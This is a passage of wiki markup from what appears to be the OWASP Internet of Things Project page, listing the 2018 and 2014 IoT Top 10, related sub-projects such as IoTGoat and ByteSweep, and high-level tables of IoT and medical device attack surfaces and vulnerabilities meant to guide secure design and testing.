Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides, Tools, and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon this work, distribute the resulting work only under the same or a similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]]. IoTGoat is expected to be released by December 2019. <br />
<br />
To get more information on getting started or how to contribute, visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT firmware security analysis platform. It allows IoT device makers, large and small, to run fully automated security checks on their firmware before they ship it.<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for outdated software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A network service can be attacked in a way that makes that service, or the entire device, unavailable<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software-based security controls.<br />
* Side-channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
